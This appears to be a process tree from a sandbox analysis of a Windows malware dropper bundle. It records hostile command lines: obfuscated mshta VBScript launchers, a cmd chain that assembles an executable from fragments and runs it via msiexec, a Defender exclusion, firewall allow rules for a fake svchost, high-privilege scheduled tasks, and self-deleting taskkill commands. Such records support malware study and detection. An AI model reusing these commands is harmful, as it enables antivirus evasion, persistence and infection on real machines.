C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Q9xi9OxMqIZUmLDloWSzVsRC.exe"C:\Users\Admin\Pictures\Adobe Films\Q9xi9OxMqIZUmLDloWSzVsRC.exe"6⤵
-
C:\Users\Admin\Documents\PUTgvc0326E9l7mA9sTkorVb.exe"C:\Users\Admin\Documents\PUTgvc0326E9l7mA9sTkorVb.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\ofKeWRq9xNM1UwkmJgnR6Oed.exe"C:\Users\Admin\Pictures\Adobe Films\ofKeWRq9xNM1UwkmJgnR6Oed.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\qW0bAoCgF4Wa0qZHb6n8wu12.exe"C:\Users\Admin\Pictures\Adobe Films\qW0bAoCgF4Wa0qZHb6n8wu12.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "qW0bAoCgF4Wa0qZHb6n8wu12.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\qW0bAoCgF4Wa0qZHb6n8wu12.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "qW0bAoCgF4Wa0qZHb6n8wu12.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\d2mugp___m6TOVo9sbBOygXY.exe"C:\Users\Admin\Pictures\Adobe Films\d2mugp___m6TOVo9sbBOygXY.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "SkybIUiBuY9Jvjsk3zdQEIhJ.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\T02u0aQkohY8nFGgn8HwY9yl.exe"C:\Users\Admin\Pictures\Adobe Films\T02u0aQkohY8nFGgn8HwY9yl.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\uY7wtZLEzOTScfSukKDZWAAv.exe"C:\Users\Admin\Pictures\Adobe Films\uY7wtZLEzOTScfSukKDZWAAv.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\ysg2Y3Z2QSbcsVzRtzLe3S4g.exe"C:\Users\Admin\Pictures\Adobe Films\ysg2Y3Z2QSbcsVzRtzLe3S4g.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ffda769dec0,0x7ffda769ded0,0x7ffda769dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x180,0x184,0x188,0xbc,0x18c,0x7ff757599e70,0x7ff757599e80,0x7ff757599e9012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,5854799455816390656,6244105331867913633,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11000_164015626" --mojo-platform-channel-handle=1680 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\FWhv9XPI2tB1uLEMqeR72GYB.exe"C:\Users\Admin\Pictures\Adobe Films\FWhv9XPI2tB1uLEMqeR72GYB.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SOR96.tmp\FWhv9XPI2tB1uLEMqeR72GYB.tmp"C:\Users\Admin\AppData\Local\Temp\is-SOR96.tmp\FWhv9XPI2tB1uLEMqeR72GYB.tmp" /SL5="$20752,506127,422400,C:\Users\Admin\Pictures\Adobe Films\FWhv9XPI2tB1uLEMqeR72GYB.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-TAJPL.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-TAJPL.tmp\DYbALA.exe" /S /UID=270910⤵
-
C:\Program Files\Microsoft Office\HYFAWAPQZP\foldershare.exe"C:\Program Files\Microsoft Office\HYFAWAPQZP\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\81-cb7c0-569-e70a0-5d9e6473d7236\Laruzheraelu.exe"C:\Users\Admin\AppData\Local\Temp\81-cb7c0-569-e70a0-5d9e6473d7236\Laruzheraelu.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\3d-ba936-3f4-dc290-d8ba30ff2527b\Sycafuqowy.exe"C:\Users\Admin\AppData\Local\Temp\3d-ba936-3f4-dc290-d8ba30ff2527b\Sycafuqowy.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0trz03iq.3n1\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\0trz03iq.3n1\installer.exeC:\Users\Admin\AppData\Local\Temp\0trz03iq.3n1\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54a0y4l2.k3m\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\54a0y4l2.k3m\any.exeC:\Users\Admin\AppData\Local\Temp\54a0y4l2.k3m\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rvkr1lcn.bk3\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\rvkr1lcn.bk3\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\rvkr1lcn.bk3\autosubplayer.exe /S13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso3F9A.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\mjeNf8YrtejDsReEKCLLAvuO.exe"C:\Users\Admin\Pictures\Adobe Films\mjeNf8YrtejDsReEKCLLAvuO.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\ONcgcjSMGSkVE6lavV_NePua.exe"C:\Users\Admin\Pictures\Adobe Films\ONcgcjSMGSkVE6lavV_NePua.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im ONcgcjSMGSkVE6lavV_NePua.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ONcgcjSMGSkVE6lavV_NePua.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ONcgcjSMGSkVE6lavV_NePua.exe /f8⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\thqLUFXjb0avcgr4Ff2QIILe.exe"C:\Users\Admin\Pictures\Adobe Films\thqLUFXjb0avcgr4Ff2QIILe.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\tzhXPiwxaSuXjvgggWPEBDSn.exe"C:\Users\Admin\Pictures\Adobe Films\tzhXPiwxaSuXjvgggWPEBDSn.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6447⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6647⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 7527⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\hIQcqXQv_K62G4yPMndMZZKq.exe"C:\Users\Admin\Pictures\Adobe Films\hIQcqXQv_K62G4yPMndMZZKq.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Users\Admin\Pictures\Adobe Films\aJ28VtTjRSZnt5dTwxYRl1Rk.exe"C:\Users\Admin\Pictures\Adobe Films\aJ28VtTjRSZnt5dTwxYRl1Rk.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\QcSY6e_2AiBKGGYRqNzIRvah.exe"C:\Users\Admin\Pictures\Adobe Films\QcSY6e_2AiBKGGYRqNzIRvah.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\xcppdWmnNoemjy4i2ZKoqIp2.exe"C:\Users\Admin\Pictures\Adobe Films\xcppdWmnNoemjy4i2ZKoqIp2.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\qYDVN5tTtoYWPLMTngD0JSXF.exe"C:\Users\Admin\Pictures\Adobe Films\qYDVN5tTtoYWPLMTngD0JSXF.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\5cnhkQf4VtDCo3IPvf1yRxAd.exe"C:\Users\Admin\Pictures\Adobe Films\5cnhkQf4VtDCo3IPvf1yRxAd.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\HIhCwEVlrwQYTzQJMUoV0B7N.exe"C:\Users\Admin\Pictures\Adobe Films\HIhCwEVlrwQYTzQJMUoV0B7N.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\n80plkY7gX9DRffeGxF4r24C.exe"C:\Users\Admin\Pictures\Adobe Films\n80plkY7gX9DRffeGxF4r24C.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\MOiCJsG0UqZXbmm5UReIPquK.exe"C:\Users\Admin\Pictures\Adobe Films\MOiCJsG0UqZXbmm5UReIPquK.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\zT3C2bV2gmRqQaosw1Ox0shL.exe"C:\Users\Admin\Pictures\Adobe Films\zT3C2bV2gmRqQaosw1Ox0shL.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "AQ_I3R69NJG_m4w14VMpsWDq.exe" -F9⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\SCs8iAJaRFYrygLwD7sRN0st.exe"C:\Users\Admin\Pictures\Adobe Films\SCs8iAJaRFYrygLwD7sRN0st.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2991246.exe"C:\Users\Admin\AppData\Roaming\2991246.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\3758203.exe"C:\Users\Admin\AppData\Roaming\3758203.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\5396287.exe"C:\Users\Admin\AppData\Roaming\5396287.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\6033949.exe"C:\Users\Admin\AppData\Roaming\6033949.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\4936525.exe"C:\Users\Admin\AppData\Roaming\4936525.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\1426400.exe"C:\Users\Admin\AppData\Roaming\1426400.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\LwNFsKaJt7Pr5JOVSaFqKDYL.exe"C:\Users\Admin\Pictures\Adobe Films\LwNFsKaJt7Pr5JOVSaFqKDYL.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ffda769dec0,0x7ffda769ded0,0x7ffda769dee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2260 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2212 /prefetch:19⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=1956 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=1944 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1896 /prefetch:29⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2916 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=520 /prefetch:29⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=3684 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2236 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=1984 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2852 /prefetch:89⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --mojo-platform-channel-handle=2240 /prefetch:89⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu124078ed79bdbd5.exeThu124078ed79bdbd5.exe5⤵
-
C:\Users\Admin\Pictures\Adobe Films\t387yWN3jW2latLaqDmyZFpN.exe"C:\Users\Admin\Pictures\Adobe Films\t387yWN3jW2latLaqDmyZFpN.exe"6⤵
-
